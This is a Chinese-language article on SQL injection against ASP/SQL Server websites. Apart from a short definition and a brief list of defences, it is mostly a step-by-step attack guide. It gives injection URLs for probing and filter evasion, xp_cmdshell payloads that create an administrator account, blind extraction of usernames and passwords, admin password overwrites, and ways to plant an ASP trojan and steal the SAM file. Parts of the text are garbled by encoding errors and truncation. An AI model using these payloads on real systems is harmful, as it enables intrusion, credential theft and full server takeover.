SQL注入攻擊

詞語解釋

SQL注入攻擊是指攻擊者通過把惡意的SQL命令插入到Web表單輸入域或者Web請(qǐng)求中，來達(dá)到欺騙服務(wù)器執(zhí)行惡意指令的一種攻擊方式。 SQL注入攻擊是一種非常常見的網(wǎng)絡(luò)攻擊，它可以通過惡意的SQL語句來攻擊數(shù)據(jù)庫(kù)，從而獲取敏感信息，如用戶名和密碼，甚至控制服務(wù)器。 SQL注入攻擊是通過把惡意的SQL命令插入到Web表單輸入域或者Web請(qǐng)求中，來達(dá)到欺騙服務(wù)器執(zhí)行惡意指令的一種攻擊方式。當(dāng)用戶輸入的數(shù)據(jù)被Web服務(wù)器接收到時(shí)，Web服務(wù)器會(huì)將用戶輸入的數(shù)據(jù)與數(shù)據(jù)庫(kù)中的數(shù)據(jù)進(jìn)行比較，如果用戶輸入的數(shù)據(jù)中包含了惡意的SQL命令，那么Web服務(wù)器就會(huì)將惡意的SQL命令當(dāng)做正常的SQL語句來執(zhí)行，從而導(dǎo)致數(shù)據(jù)庫(kù)的數(shù)據(jù)被攻擊者篡改或者泄露。 SQL注入攻擊的主要目的是獲取數(shù)據(jù)庫(kù)中的敏感信息，如用戶名和密碼，以及控制服務(wù)器。攻擊者可以利用SQL注入攻擊來破壞數(shù)據(jù)庫(kù)的完整性，從而篡改數(shù)據(jù)庫(kù)中的數(shù)據(jù)，比如改變用戶的密碼，刪除數(shù)據(jù)庫(kù)中的數(shù)據(jù)，或者添加惡意代碼到數(shù)據(jù)庫(kù)中，從而實(shí)現(xiàn)攻擊者的惡意目的。 SQL注入攻擊的防范措施有：對(duì)用戶輸入的數(shù)據(jù)進(jìn)行過濾和檢查，以防止惡意SQL命令的插入；使用參數(shù)化查詢，以防止SQL注入攻擊；使用防火墻和入侵檢測(cè)系統(tǒng)，以檢測(cè)和阻止攻擊者的攻擊行為；定期對(duì)數(shù)據(jù)庫(kù)進(jìn)行安全漏洞掃描，以發(fā)現(xiàn)和修復(fù)潛在的安全漏洞。

　　SQL注入攻擊是黑客對(duì)數(shù)據(jù)庫(kù)進(jìn)行攻擊的常用手段之一。隨著B/S模式應(yīng)用開發(fā)的發(fā)展，使用這種模式編寫應(yīng)用程序的程序員也越來越多。但是由于程序員的水平及經(jīng)驗(yàn)也參差不齊，相當(dāng)大一部分程序員在編寫代碼的時(shí)候，沒有對(duì)用戶輸入數(shù)據(jù)的合法性進(jìn)行判斷，使應(yīng)用程序存在安全隱患。用戶可以提交一段數(shù)據(jù)庫(kù)查詢代碼，根據(jù)程序返回的結(jié)果，獲得某些他想得知的數(shù)據(jù)，這就是所謂的SQL Injection，即SQL注入。SQL注入是從正常的WWW端口訪問，而且表面看起來跟一般的Web頁(yè)面訪問沒什么區(qū)別，所以目前市面的防火墻都不會(huì)對(duì)SQL注入發(fā)出警報(bào)，如果管理員沒查看IIS日志的習(xí)慣，可能被入侵很長(zhǎng)時(shí)間都不會(huì)發(fā)覺。但是，SQL注入的手法相當(dāng)靈活，在注入的時(shí)候會(huì)碰到很多意外的情況，需要構(gòu)造巧妙的SQL語句，從而成功獲取想要的數(shù)據(jù)。
　　SQL注入攻擊的總體思路
　　·發(fā)現(xiàn)SQL注入位置；
　　·判斷后臺(tái)數(shù)據(jù)庫(kù)類型；
　　·確定XP_CMDSHELL可執(zhí)行情況
　　·發(fā)現(xiàn)WEB虛擬目錄
　　·上傳ASP木馬；
　　·得到管理員權(quán)限；
　　SQL注入攻擊的步驟
　　一、SQL注入漏洞的判斷
　　一般來說，SQL注入一般存在于形如：HTTP://xxx.xxx.xxx/abc.asp?id=XX等帶有參數(shù)的ASP動(dòng)態(tài)網(wǎng)頁(yè)中，有時(shí)一個(gè)動(dòng)態(tài)網(wǎng)頁(yè)中可能只有一個(gè)參數(shù)，有時(shí)可能有N個(gè)參數(shù)，有時(shí)是整型參數(shù)，有時(shí)是字符串型參數(shù)，不能一概而論。總之只要是帶有參數(shù)的動(dòng)態(tài)網(wǎng)頁(yè)且此網(wǎng)頁(yè)訪問了數(shù)據(jù)庫(kù)，那么就有可能存在SQL注入。如果ASP程序員沒有安全意識(shí)，不進(jìn)行必要的字符過濾，存在SQL注入的可能性就非常大。
　　為了全面了解動(dòng)態(tài)網(wǎng)頁(yè)回答的信息，首選請(qǐng)調(diào)整IE的配置。把IE菜單-工具-Internet選項(xiàng)－高級(jí)－顯示友好HTTP錯(cuò)誤信息前面的勾去掉。
　　為了把問題說明清楚，以下以HTTP://xxx.xxx.xxx/abc.asp?p=YY為例進(jìn)行分析，YY可能是整型，也有可能是字符串。
　　1、整型參數(shù)的判斷
　　當(dāng)輸入的參數(shù)YY為整型時(shí)，通常abc.asp中SQL語句原貌大致如下：
　　select * from 表名 where 字段=YY，所以可以用以下步驟測(cè)試SQL注入是否存在。
　�、貶TTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一個(gè)單引號(hào))，此時(shí)abc.ASP中的SQL語句變成了
　　select * from 表名 where 字段=YY’，abc.asp運(yùn)行異常；
　�、贖TTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp運(yùn)行正常，而且與HTTP://xxx.xxx.xxx/abc.asp?p=YY運(yùn)行結(jié)果相同；
　　③HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp運(yùn)行異常；
　　如果以上三步全面滿足，abc.asp中一定存在SQL注入漏洞。
　　2、字符串型參數(shù)的判斷
　　當(dāng)輸入的參數(shù)YY為字符串時(shí)，通常abc.asp中SQL語句原貌大致如下：
　　select * from 表名 where 字段=&＃039;YY&＃039;，所以可以用以下步驟測(cè)試SQL注入是否存在。
　�、貶TTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一個(gè)單引號(hào))，此時(shí)abc.ASP中的SQL語句變成了
　　select * from 表名 where 字段=YY’，abc.asp運(yùn)行異常；
　　②HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1&＃039;=&＃039;1&＃039;, abc.asp運(yùn)行正常，而且與HTTP://xxx.xxx.xxx/abc.asp?p=YY運(yùn)行結(jié)果相同；
　　③HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1&＃039;=&＃039;2&＃039;, abc.asp運(yùn)行異常；
　　如果以上三步全面滿足，abc.asp中一定存在SQL注入漏洞。
　　3、特殊情況的處理
　　有時(shí)ASP程序員會(huì)在程序員過濾掉單引號(hào)等字符，以防止SQL注入。此時(shí)可以用以下幾種方法試一試。
　　①大小定混合法：由于VBS并不區(qū)分大小寫，而程序員在過濾時(shí)通常要么全部過濾大寫字符串，要么全部過濾小寫字符串，而大小寫混合往往會(huì)被忽視。如用SelecT代替select,SELECT等；
　�、赨NICODE法：在IIS中，以UNICODE字符集實(shí)現(xiàn)國(guó)際化，我們完全可以IE中輸入的字符串化成UNICODE字符串進(jìn)行輸入。如+ =%2B，空格=%20 等；URLEncode信息參見附件一；
　�、跘SCII碼法：可以把輸入的部分或全部字符全部用ASCII碼代替，如U=chr(85),a=chr(97)等，ASCII信息參見附件二；
　　二、分析數(shù)據(jù)庫(kù)服務(wù)器類型
　　一般來說，ACCESS與SQL－SERVER是最常用的數(shù)據(jù)庫(kù)服務(wù)器，盡管它們都支持T－SQL標(biāo)準(zhǔn)，但還有不同之處，而且不同的數(shù)據(jù)庫(kù)有不同的攻擊方法，必須要區(qū)別對(duì)待。
　　1、利用數(shù)據(jù)庫(kù)服務(wù)器的系統(tǒng)變量進(jìn)行區(qū)分
　　SQL－SERVER有user,db_name()等系統(tǒng)變量，利用這些系統(tǒng)值不僅可以判斷SQL-SERVER，而且還可以得到大量有用信息。如：
　�、� HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 不僅可以判斷是否是SQL-SERVER，而還可以得到當(dāng)前連接到數(shù)據(jù)庫(kù)的用戶名
　�、贖TTP://xxx.xxx.xxx/abc.asp?p=YY&n ... db_name()>0 不僅可以判斷是否是SQL-SERVER，而還可以得到當(dāng)前正在使用的數(shù)據(jù)庫(kù)名；
　　2、利用系統(tǒng)表
　　ACCESS的系統(tǒng)表是msysobjects,且在WEB環(huán)境下沒有訪問權(quán)限，而SQL-SERVER的系統(tǒng)表是sysobjects,在WEB環(huán)境下有訪問權(quán)限。對(duì)于以下兩條語句：
　�、貶TTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0
　�、贖TTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0
　　若數(shù)據(jù)庫(kù)是SQL-SERVE，則第一條，abc.asp一定運(yùn)行正常，第二條則異常；若是ACCESS則兩條都會(huì)異常。
　　3、 MSSQL三個(gè)關(guān)鍵系統(tǒng)表
　　sysdatabases系統(tǒng)表：Microsoft SQL Server 上的每個(gè)數(shù)據(jù)庫(kù)在表中占一行。最初安裝 SQL Server 時(shí)，sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 數(shù)據(jù)庫(kù)的項(xiàng)。該表只存儲(chǔ)在 master 數(shù)據(jù)庫(kù)中。這個(gè)表保存在master數(shù)據(jù)庫(kù)中，這個(gè)表中保存的是什么信息呢？這個(gè)非常重要。他是保存了所有的庫(kù)名,以及庫(kù)的ID和一些相關(guān)信息。
　　這里我把對(duì)于我們有用的字段名稱和相關(guān)說明給大家列出來。name //表示庫(kù)的名字。
　　dbid //表示庫(kù)的ID，dbid從1到5是系統(tǒng)的。分別是：master、model、msdb、mssqlweb、tempdb 這五個(gè)庫(kù)。用select * from master.dbo.sysdatabases 就可以查詢出所有的庫(kù)名。
　　Sysobjects：SQL-SERVER的每個(gè)數(shù)據(jù)庫(kù)內(nèi)都有此系統(tǒng)表，它存放該數(shù)據(jù)庫(kù)內(nèi)創(chuàng)建的所有對(duì)象，如約束、默認(rèn)值、日志、規(guī)則、存儲(chǔ)過程等，每個(gè)對(duì)象在表中占一行。
　　syscolumns：每個(gè)表和視圖中的每列在表中占一行，存儲(chǔ)過程中的每個(gè)參數(shù)在表中也占一行。該表位于每個(gè)數(shù)據(jù)庫(kù)中。主要字段有：
　　name ，id， colid ：分別是字段名稱，表ID號(hào)，字段ID號(hào)，其中的 ID 是剛上我們用sysobjects得到的表的ID號(hào)。
　　用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD這個(gè)庫(kù)中，表的ID是123456789中的所有字段列表。
　　三、確定XP_CMDSHELL可執(zhí)行情況
　　若當(dāng)前連接數(shù)據(jù)的帳號(hào)具有SA權(quán)限，且master.dbo.xp_cmdshell擴(kuò)展存儲(chǔ)過程(調(diào)用此存儲(chǔ)過程可以直接使用操作系統(tǒng)的shell)能夠正確執(zhí)行，則整個(gè)計(jì)算機(jī)可以通過以下幾種方法完全控制，以后的所有步驟都可以省
　　1、HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... er>0 abc.asp執(zhí)行異常但可以得到當(dāng)前連接數(shù)據(jù)庫(kù)的用戶名(若顯示dbo則代表SA)。
　　2、HTTP://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp執(zhí)行異常但可以得到當(dāng)前連接的數(shù)據(jù)庫(kù)名。
　　3、HTTP://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell “net user aaa bbb /add”-- (master是SQL-SERVER的主數(shù)據(jù)庫(kù)；名中的分號(hào)表示SQL-SERVER執(zhí)行完分號(hào)前的語句名，繼續(xù)執(zhí)行其后面的語句；“—”號(hào)是注解，表示其后面的所有內(nèi)容僅為注釋，系統(tǒng)并不執(zhí)行)可以直接增加操作系統(tǒng)帳戶aaa,密碼為bbb。
　　4、HTTP://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把剛剛增加的帳戶aaa加到administrators組中。
　　5、HTTP://xxx.xxx.xxx/abc.asp?p=YY；backuup database 數(shù)據(jù)庫(kù)名 to disk=&＃039;c:inetpubwwwrootsave.db&＃039; 則把得到的數(shù)據(jù)內(nèi)容全部備份到WEB目錄下，再用HTTP把此文件下載(當(dāng)然首選要知道WEB虛擬目錄)。
　　6、通過復(fù)制CMD創(chuàng)建UNICODE漏洞
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell “copy c:winntsystem32cmd.exe c:inetpubs criptscmd.exe” 便制造了一個(gè)UNICODE漏洞，通過此漏洞的利用方法，便完成了對(duì)整個(gè)計(jì)算機(jī)的控制(當(dāng)然首選要知道WEB虛擬目錄)。
　　四、發(fā)現(xiàn)WEB虛擬目錄
　　只有找到WEB虛擬目錄，才能確定放置ASP木馬的位置，進(jìn)而得到USER權(quán)限。有兩種方法比較有效。
　　一是根據(jù)經(jīng)驗(yàn)猜解，一般來說，WEB虛擬目錄是：c:inetpubwwwroot; D:inetpubwwwroot; E:inetpubwwwroot等，而可執(zhí)行虛擬目錄是：c:inetpubs cripts; D:inetpubs cripts; E:inetpubs cripts等。
　　二是遍歷系統(tǒng)的目錄結(jié)構(gòu)，分析結(jié)果并發(fā)現(xiàn)WEB虛擬目錄；
　　先創(chuàng)建一個(gè)臨時(shí)表：temp
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n ... mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
　　接下來：
　　（1）利用xp_availablemedia來獲得當(dāng)前所有驅(qū)動(dòng)器,并存入temp表中：
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ... ter.dbo.xp_availablemedia;--
　　我們可以通過查詢temp的內(nèi)容來獲得驅(qū)動(dòng)器列表及相關(guān)信息
　�。�2）利用xp_subdirs獲得子目錄列表,并存入temp表中：
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(i ... dbo.xp_subdirs &＃039;c:&＃039;;--
　�。�3）利用xp_dirtree獲得所有子目錄的目錄樹結(jié)構(gòu),并寸入temp表中：
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree &＃039;c:&＃039;;--
　　注意：
　　1、以上每完成一項(xiàng)瀏覽后，應(yīng)刪除TEMP中的所有內(nèi)容，刪除方法是：
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;delete from temp;--
　　2、瀏覽TEMP表的方法是：(假設(shè)TestDB是當(dāng)前連接的數(shù)據(jù)庫(kù)名)
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ... nbsp;TestDB.dbo.temp )>0 得到表TEMP中第一條記錄id字段的值，并與整數(shù)進(jìn)行比較，顯然abc.asp工作異常，但在異常中卻可以發(fā)現(xiàn)id字段的值。假設(shè)發(fā)現(xiàn)的表名是xyz，則
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from ... ere id not in(&＃039;xyz&＃039;))>0 得到表TEMP中第二條記錄id字段的值。
　　五、上傳ASP木馬
　　所謂ASP木馬，就是一段有特殊功能的ASP代碼，并放入WEB虛擬目錄的s cripts下，遠(yuǎn)程客戶通過IE就可執(zhí)行它，進(jìn)而得到系統(tǒng)的USER權(quán)限，實(shí)現(xiàn)對(duì)系統(tǒng)的初步控制。上傳ASP木馬一般有兩種比較有效的方法：
　　1、利用WEB的遠(yuǎn)程管理功能
　　許多WEB站點(diǎn)，為了維護(hù)的方便，都提供了遠(yuǎn)程管理的功能；也有不少WEB站點(diǎn)，其內(nèi)容是對(duì)于不同的用戶有不同的訪問權(quán)限。為了達(dá)到對(duì)用戶權(quán)限的控制，都有一個(gè)網(wǎng)頁(yè)，要求用戶名與密碼，只有輸入了正確的值，才能進(jìn)行下一步的操作,可以實(shí)現(xiàn)對(duì)WEB的管理，如上傳、下載文件，目錄瀏覽、修改配置等。
　　因此，若獲取正確的用戶名與密碼，不僅可以上傳ASP木馬，有時(shí)甚至能夠直接得到USER權(quán)限而瀏覽系統(tǒng)，上一步的“發(fā)現(xiàn)WEB虛擬目錄”的復(fù)雜操作都可省略。
　　用戶名及密碼一般存放在一張表中，發(fā)現(xiàn)這張表并讀取其中內(nèi)容便解決了問題。以下給出兩種有效方法。
　　A、注入法：
　　從理論上說，認(rèn)證網(wǎng)頁(yè)中會(huì)有型如：
　　select * from admin where username=&＃039;XXX&＃039; and password=&＃039;YYY&＃039; 的語句，若在正式運(yùn)行此句之前，沒有進(jìn)行必要的字符過濾，則很容易實(shí)施SQL注入。
　　如在用戶名文本框內(nèi)輸入：abc’ or 1=1-- 在密碼框內(nèi)輸入：123 則SQL語句變成：
　　select * from admin where username=&＃039;abc’ or 1=1 and password=&＃039;123’ 不管用戶輸入任何用戶名與密碼，此語句永遠(yuǎn)都能正確執(zhí)行，用戶輕易騙過系統(tǒng)，獲取合法身份。
　　B、猜解法：
　　基本思路是：猜解所有數(shù)據(jù)庫(kù)名稱，猜出庫(kù)中的每張表名，分析可能是存放用戶名與密碼的表名，猜出表中的每個(gè)字段名，猜出表中的每條記錄內(nèi)容。
　　猜解所有數(shù)據(jù)庫(kù)名稱
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 因?yàn)?dbid 的值從1到5，是系統(tǒng)用了。所以用戶自己建的一定是從6開始的。并且我們提交了 name>1 (name字段是一個(gè)字符型的字段和數(shù)字比較會(huì)出錯(cuò)),abc.asp工作異常，可得到第一個(gè)數(shù)據(jù)庫(kù)名，同理把DBID分別改成7,8，9,10,11,12…就可得到所有數(shù)據(jù)庫(kù)名。
　　以下假設(shè)得到的數(shù)據(jù)庫(kù)名是TestDB。
　　猜解數(shù)據(jù)庫(kù)中用戶名表的名稱
　　猜解法：此方法就是根據(jù)個(gè)人的經(jīng)驗(yàn)猜表名，一般來說，user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。并通過語句進(jìn)行判斷
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from TestDB.dbo.表名)>0 若表名存在，則abc.asp工作正常，否則異常。如此循環(huán)，直到猜到系統(tǒng)帳號(hào)表的名稱。
　　讀取法：SQL-SERVER有一個(gè)存放系統(tǒng)核心信息的表sysobjects，有關(guān)一個(gè)庫(kù)的所有表，視圖等信息全部存放在此表中，而且此表可以通過WEB進(jìn)行訪問。
　　當(dāng)xtype=&＃039;U&＃039; and status>0代表是用戶建立的表，發(fā)現(xiàn)并分析每一個(gè)用戶建立的表及名稱，便可以得到用戶名表的名稱，基本的實(shí)現(xiàn)方法是：
　�、貶TTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestD ... type=&＃039;U&＃039; and status>0 )>0 得到第一個(gè)用戶建立表的名稱，并與整數(shù)進(jìn)行比較，顯然abc.asp工作異常，但在異常中卻可以發(fā)現(xiàn)表的名稱。假設(shè)發(fā)現(xiàn)的表名是xyz，則
　�、贖TTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestDB.dbo.sysobjects& ... tatus>0 and name not in(&＃039;xyz&＃039;))>0 可以得到第二個(gè)用戶建立的表的名稱，同理就可得到所有用建立的表的名稱。
　　根據(jù)表的名稱，一般可以認(rèn)定那張表用戶存放用戶名及密碼，以下假設(shè)此表名為Admin。
　　l 猜解用戶名字段及密碼字段名稱
　　admin表中一定有一個(gè)用戶名字段，也一定有一個(gè)密碼字段，只有得到此兩個(gè)字段的名稱，才有可能得到此兩字段的內(nèi)容。如何得到它們的名稱呢，同樣有以下兩種方法。
　　猜解法：此方法就是根據(jù)個(gè)人的經(jīng)驗(yàn)猜字段名，一般來說，用戶名字段的名稱常用：username,name,user,account等。而密碼字段的名稱常用：password,pass,pwd,passwd等。并通過語句進(jìn)行判斷
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(字段名) from TestDB.dbo.admin)>0 “select count(字段名) from 表名”語句得到表的行數(shù)，所以若字段名存在，則abc.asp工作正常，否則異常。如此循環(huán)，直到猜到兩個(gè)字段的名稱。
　　讀取法：基本的實(shí)現(xiàn)方法是
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select ... me(object_id(&＃039;admin&＃039;),1) from TestDB.dbo.sysobjects)>0 。select top 1 col_name(object_id(&＃039;admin&＃039;),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個(gè)字段名，當(dāng)與整數(shù)進(jìn)行比較，顯然abc.asp工作異常，但在異常中卻可以發(fā)現(xiàn)字段的名稱。把col_name(object_id(&＃039;admin&＃039;),1)中的1依次換成2,3,4,5，6…就可得到所有的字段名稱。
　　l 猜解用戶名與密碼
　　猜用戶名與密碼的內(nèi)容最常用也是最有效的方法有：
　　ASCII碼逐字解碼法:雖然這種方法速度較慢，但肯定是可行的�；镜乃悸肥窍炔鲁鲎侄蔚拈L(zhǎng)度，然后依次猜出每一位的值。猜用戶名與猜密碼的方法相同，以下以猜用戶名為例說明其過程。
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top&n ... nbsp;from TestDB.dbo.admin)=X(X=1,2，3,4，5，… n，username為用戶名字段的名稱，admin為表的名稱)，若x為某一值i且abc.asp運(yùn)行正常時(shí)，則i就是第一個(gè)用戶名的長(zhǎng)度。如：當(dāng)輸入
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top ... e) from TestDB.dbo.admin)=8時(shí)abc.asp運(yùn)行正常，則第一個(gè)用戶名的長(zhǎng)度為8
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用戶名長(zhǎng)度之間，當(dāng)m=1，2,3，…時(shí)猜測(cè)分別猜測(cè)第1,2,3,…位的值；n的值是1~9、a~z、A~Z的ASCII值，也就是1~128之間的任意值；admin為系統(tǒng)用戶帳號(hào)表的名稱)，若n為某一值i且abc.asp運(yùn)行正常時(shí)，則i對(duì)應(yīng)ASCII碼就是用戶名某一位值。如：當(dāng)輸入
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時(shí)abc.asp運(yùn)行正常，則用戶名的第三位為P(P的ASCII為80)；
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時(shí)abc.asp運(yùn)行正常，則用戶名的第9位為!(!的ASCII為80)；
　　猜到第一個(gè)用戶名及密碼后，同理，可以猜出其他所有用戶名與密碼。注意：有時(shí)得到的密碼可能是經(jīng)MD5等方式加密后的信息，還需要用專用工具進(jìn)行脫密�；蛘呦雀钠涿艽a，使用完后再改回來，見下面說明。
　　簡(jiǎn)單法：猜用戶名用
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 ... o.admin where username>1) , flag是admin表中的一個(gè)字段，username是用戶名字段，此時(shí)abc.asp工作異常，但能得到Username的值。與上同樣的方法，可以得到第二用戶名，第三個(gè)用戶等等，直到表中的所有用戶名。
　　猜用戶密碼：HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1&nb ... B.dbo.admin where pwd>1) , flag是admin表中的一個(gè)字段，pwd是密碼字段，此時(shí)abc.asp工作異常，但能得到pwd的值。與上同樣的方法，可以得到第二用戶名的密碼，第三個(gè)用戶的密碼等等，直到表中的所有用戶的密碼。密碼有時(shí)是經(jīng)MD5加密的，可以改密碼。
　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;update TestDB.dbo.admin set pwd=&＃039; ... where username=&＃039;www&＃039;;-- ( 1的MD5值為：AAABBBCCCDDDEEEF，即把密碼改成1；www為已知的用戶名)
　　用同樣的方法當(dāng)然可把密碼改原來的值。
　　2、利用表內(nèi)容導(dǎo)成文件功能
　　SQL有BCP命令，它可以把表的內(nèi)容導(dǎo)成文本文件并放到指定位置。利用這項(xiàng)功能，我們可以先建一張臨時(shí)表，然后在表中一行一行地輸入一個(gè)ASP木馬，然后用BCP命令導(dǎo)出形成ASP文件。
　　命令行格式如下：
　　bcp "select * from text..foo" queryout c:inetpubwwwroot uncommand.asp –c –S localhost –U sa –P foobar (&＃039;S&＃039;參數(shù)為執(zhí)行查詢的服務(wù)器，&＃039;U&＃039;參數(shù)為用戶名，&＃039;P&＃039;參數(shù)為密碼，最終上傳了一個(gè)runcommand.asp的木馬)
　　六、得到系統(tǒng)的管理員權(quán)限
　　ASP木馬只有USER權(quán)限，要想獲取對(duì)系統(tǒng)的完全控制，還要有系統(tǒng)的管理員權(quán)限。怎么辦？提升權(quán)限的方法有很多種：
　　上傳木馬，修改開機(jī)自動(dòng)運(yùn)行的.ini文件(它一重啟，便死定了)；
　　復(fù)制CMD.exe到s cripts，人為制造UNICODE漏洞；
　　下載SAM文件，破解并獲取OS的所有用戶名密碼；
　　等等，視系統(tǒng)的具體情況而定，可以采取不同的方法。
　　七、幾個(gè)SQL-SERVER專用手段
　　1、利用xp_regread擴(kuò)展存儲(chǔ)過程修改注冊(cè)表
　　[xp_regread]另一個(gè)有用的內(nèi)置存儲(chǔ)過程是xp_regXXXX類的函數(shù)集合(Xp_regaddmultistring，Xp_regdeletekey，Xp_regdeletevalue，Xp_regenumkeys，Xp_regenumvalues，Xp_regread，Xp_regremovemultistring，Xp_regwrite)。攻擊者可以利用這些函數(shù)修改注冊(cè)表，如讀取SAM值，允許建立空連接，開機(jī)自動(dòng)運(yùn)行程序等。如：
　　exec xp_regread HKEY_LOCAL_MACHINE,&＃039;SYSTEMCurrentControlSetServiceslanmanserverparameters&＃039;, &＃039;nullsessionshares&＃039; 確定什么樣的會(huì)話連接在服務(wù)器可用。
　　exec xp_regenumvalues HKEY_LOCAL_MACHINE,&＃039;SYSTEMCurrentControlSetServicessnmpparametersvalidcommunities&＃039; 顯示服務(wù)器上所有SNMP團(tuán)體配置，有了這些信息，攻擊者或許會(huì)重新配置同一網(wǎng)絡(luò)中的網(wǎng)絡(luò)設(shè)備。
　　2、利用其他存儲(chǔ)過程去改變服務(wù)器
　　xp_servicecontrol過程允許用戶啟動(dòng)，停止服務(wù)。如：
　　(exec master..xp_servicecontrol &＃039;start&＃039;,&＃039;schedule&＃039;
　　exec master..xp_servicecontrol &＃039;start&＃039;,&＃039;server&＃039;)
　　Xp_availablemedia 顯示機(jī)器上有用的驅(qū)動(dòng)器
　　Xp_dirtree 允許獲得一個(gè)目錄樹
　　Xp_enumdsn 列舉服務(wù)器上的ODBC數(shù)據(jù)源
　　Xp_loginconfig 獲取服務(wù)器安全信息
　　Xp_makecab 允許用戶在服務(wù)器上創(chuàng)建一個(gè)壓縮文件
　　Xp_ntsec_enumdomains 列舉服務(wù)器可以進(jìn)入的域
　　Xp_terminate_process 提供進(jìn)程的進(jìn)程ID，終止此進(jìn)程
　　SQL注入攻擊的背景
　　在計(jì)算機(jī)技術(shù)高速發(fā)展的今天，越來越讓人們頭疼的是面臨越來越“變態(tài)”和復(fù)雜的威脅網(wǎng)站技術(shù)，他們利用Internet 執(zhí)行各種惡意活動(dòng)，如身份竊取、私密信息竊取、帶寬資源占用等。它們潛入之后，還會(huì)擴(kuò)散并不斷更新自己。這些活動(dòng)常常利用用戶的好奇心，在用戶不知道或未來允許的情況下潛入用戶的PC，不知不覺中，帳戶里的資金就被轉(zhuǎn)移了，公司訊息也被傳送出去，危害十分嚴(yán)重。2006年8月16日，第一個(gè)Web威脅樣本出現(xiàn)，截止到2006年10月25日，已經(jīng)產(chǎn)生了第150個(gè)變種，并且，還在不斷地演化下去。
　　網(wǎng)站威脅的目標(biāo)定位有多個(gè)維度，是個(gè)人還是公司，還是某種行業(yè)，都有其考慮，甚至國(guó)家、地區(qū)、性別、種族、宗教等也成為發(fā)動(dòng)攻擊的原因或動(dòng)機(jī)。攻擊還會(huì)采用多種形態(tài)，甚至是復(fù)合形態(tài)，比如病毒、蠕蟲、特洛伊、間諜軟件、僵尸、網(wǎng)絡(luò)釣魚電子郵件、漏洞利用、下載程序、社會(huì)工程、rootkit、黑客，結(jié)果都可以導(dǎo)致用戶信息受到危害，或者導(dǎo)致用戶所需的服務(wù)被拒絕和劫持。從其來源說Web威脅還可以分為內(nèi)部攻擊和外部攻擊兩類。前者主要來自信任網(wǎng)絡(luò)，可能是用戶執(zhí)行了未授權(quán)訪問或是無意中定制了惡意攻擊；后者主要是由于網(wǎng)絡(luò)漏洞被利用或者用戶受到惡意程序制定者的專一攻擊。
　　SQL注入攻擊的網(wǎng)絡(luò)分析
　　SQL注入攻擊是非常令人討厭的安全漏洞，是所有的web開發(fā)人員，不管是什么平臺(tái)，技術(shù)，還是數(shù)據(jù)層，需要確信他們理解和防止的東西。不幸的是，開發(fā)人員往往不集中花點(diǎn)時(shí)間在這上面，以至他們的應(yīng)用，更糟糕的是，他們的客戶極其容易受到攻擊。
　　Michael Sutton 最近發(fā)表了一篇非常發(fā)人深省的帖子，講述在公共網(wǎng)上這問題是多么地普遍。他用Google的Search API建了一個(gè)C#的客戶端程序，尋找那些易受SQL 注入攻擊的網(wǎng)站。其步驟很簡(jiǎn)單：
　　1，尋找那些帶查詢字符串的網(wǎng)站(例如，查詢那些在URL里帶有 "id=" 的URL)
　　2，給這些確定為動(dòng)態(tài)的網(wǎng)站發(fā)送一個(gè)請(qǐng)求，改變其中的id=語句，帶一個(gè)額外的單引號(hào)，來試圖取消其中的SQL語句(例如，如 id=6&＃039; )
　　3，分析返回的回復(fù)，在其中查找象“SQL” 和“query”這樣的詞，這往往表示應(yīng)用返回了詳細(xì)的錯(cuò)誤消息(這本身也是很糟糕的)
　　4，檢查錯(cuò)誤消息是否表示發(fā)送到SQL服務(wù)器的參數(shù)沒有被正確加碼(encoded)，如果如此，那么表示可對(duì)該網(wǎng)站進(jìn)行SQL注入攻擊
